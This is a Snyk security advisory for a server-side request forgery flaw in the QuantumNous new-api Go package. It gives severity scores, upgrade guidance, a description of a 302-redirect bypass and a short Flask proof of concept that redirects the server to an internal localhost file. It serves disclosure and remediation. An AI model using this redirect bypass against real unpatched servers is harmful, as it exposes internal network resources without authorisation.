Server-side Request Forgery (SSRF) Affecting github.com/quantumnous/new-api/dto package, versions <0.9.6-patch.1


Severity

Recommended
0.0
high
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.03% (8th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Server-side Request Forgery (SSRF) vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-GOLANG-GITHUBCOMQUANTUMNOUSNEWAPIDTO-14107161
  • published25 Nov 2025
  • disclosed25 Nov 2025
  • credith3rrr

Introduced: 25 Nov 2025

NewCVE-2025-62155  (opens in a new tab)
CWE-918  (opens in a new tab)

How to fix?

Upgrade github.com/QuantumNous/new-api/dto to version 0.9.6-patch.1 or higher.

Overview

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the bypass method. An attacker can access internal network resources by leveraging a 302 redirect to bypass existing security restrictions.

PoC

from flask import Flask, redirect  
  
app = Flask(__name__)  
  
@app.route('/redirect')  
def ssrf_redirect():  
    return redirect('http://127.0.0.1:8003/uid.txt', code=302)  
  
if __name__ == '__main__':  
    app.run(host='0.0.0.0', port=8080)

References

CVSS Base Scores

version 4.0
version 3.1